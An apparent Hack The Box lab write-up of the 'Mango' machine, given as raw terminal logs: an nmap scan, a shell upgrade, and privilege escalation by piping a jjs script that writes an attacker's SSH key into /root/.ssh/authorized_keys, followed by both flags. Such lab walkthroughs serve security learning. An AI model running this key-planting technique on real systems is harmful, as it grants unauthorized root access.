~/Documents/HTB/Mongo root@kali ❯ cat nmap.txt # Nmap 7.80 scan initiated Tue Jan 28 12:37:54 2020 as: nmap -sV -sC -oN nmap.txt 10.10.10.162 Nmap scan report for 10.10.10.162 Host is up (0.33s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA) | 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA) |_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: 403 Forbidden 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN | Not valid before: 2019-09-27T14:21:19 |_Not valid after: 2020-09-26T14:21:19 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 711/tcp filtered cisco-tdp 2119/tcp filtered gsigatekeeper Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jan 28 12:58:07 2020 -- 1 IP address (1 host up) scanned in 1213.07 seconds
System information as of Wed Jan 29 05:23:47 UTC 2020
System load: 0.0 Processes: 100 Usage of /: 25.8% of 19.56GB Users logged in: 0 Memory usage: 14% IP address for ens33: 10.10.10.162 Swap usage: 0%
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch
122 packages can be updated. 18 updates are security updates.
Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138 mango@mango:~$ su admin Password: $ python3 -c 'import pty;pty.spawn("/bin/bash")' To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
admin@mango:/home/mango$ cd admin@mango:/home/admin$ ls user.txt admin@mango:/home/admin$ cat user.txt 79bf31c6c6eb38a8567832f7f8b47e92 admin@mango:/home/admin$
~/Documents/HTB/Mango root@kali ❯ ssh-keygen -f id_rsa Generating public/private rsa key pair. Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in id_rsa. Your public key has been saved in id_rsa.pub. The key fingerprint is: SHA256:E4Zcl/a/FnyH821RCffkQZyebivfMz0mmXcmfyv5I6k root@kali The key's randomart image is: +---[RSA 3072]----+ | . .. o..| | . o .o . =.| | o o. . +o=| | . . . ++| | S o...| | . *+o| | ***| | X+OX| | E..XO@| +----[SHA256]-----+
导入authorized_keys
1 2 3 4 5 6 7 8 9 10
$ echo 'var FileWriter = Java.type("java.io.FileWriter"); > var fw=new FileWriter("/root/.ssh/authorized_keys"); > fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXYkrJjzlSTTpNIbET55u4cb+z7Zmmi91nTQAQBL+09ywk1isojMLK7uDhMNI9O2pdRdvaqpCx5psmStwc3A2xIyfX4F9NMm6MI6TjcbQ1OijHQWXMW0HausnmRvmnrxi3PmyBhwDonE7tqfmSDVL5qEmwzE6sXYxnjqgFFxyX7AcgmdO7l0uhT1cQQs8BrOJ/dI0CMajheuN6YtTFr6pOjkCYgjEEOf5HWCHUEYMMeNx4eMirtkbD4asInze3Slr+Ji9OGgVfcMvgP6AjHl/ka1kzrLpNKeAigv1pez4rN2jSymovYeSy3GhaUNh0s7/lmWFXDCBUicshwpwh2j10QIryUEJLQLe5IWFQRiIopoeXVQ0JPsi4YGELILUT4TLbCzsG+bHO9Clp4rvYRlM4wjlczUAdZlnZVvX0D9RO00lupp/NlGzUdHUGOC2uJuHf137V1eg7nJAnQ6G2q7/bVW+tuSlARIiFcUoTVR96lfZnqecimn2n5EiMhdoBqS0= root@kali"); > fw.close();' | jjs Warning: The jjs tool is planned to be removed from a future JDK release jjs> var FileWriter = Java.type("java.io.FileWriter"); jjs> var fw=new FileWriter("/root/.ssh/authorized_keys"); jjs> fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXYkrJjzlSTTpNIbET55u4cb+z7Zmmi91nTQAQBL+09ywk1isojMLK7uDhMNI9O2pdRdvaqpCx5psmStwc3A2xIyfX4F9NMm6MI6TjcbQ1OijHQWXMW0HausnmRvmnrxi3PmyBhwDonE7tqfmSDVL5qEmwzE6sXYxnjqgFFxyX7AcgmdO7l0uhT1cQQs8BrOJ/dI0CMajheuN6YtTFr6pOjkCYgjEEOf5HWCHUEYMMeNx4eMirtkbD4asInze3Slr+Ji9OGgVfcMvgP6AjHl/ka1kzrLpNKeAigv1pez4rN2jSymovYeSy3GhaUNh0s7/lmWFXDCBUicshwpwh2j10QIryUEJLQLe5IWFQRiIopoeXVQ0JPsi4YGELILUT4TLbCzsG+bHO9Clp4rvYRlM4wjlczUAdZlnZVvX0D9RO00lupp/NlGzUdHUGOC2uJuHf137V1eg7nJAnQ6G2q7/bVW+tuSlARIiFcUoTVR96lfZnqecimn2n5EiMhdoBqS0= root@kali"); jjs> fw.close(); jjs> $
System information as of Wed Jan 29 05:45:32 UTC 2020
System load: 0.06 Processes: 107 Usage of /: 25.9% of 19.56GB Users logged in: 1 Memory usage: 24% IP address for ens33: 10.10.10.162 Swap usage: 0%
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch
122 packages can be updated. 18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan 29 05:44:23 2020 from 10.10.14.13 root@mango:~# ls root.txt root@mango:~# cat root.txt 8a8ef79a7a2fbb01ea81688424e9ab15 root@mango:~#
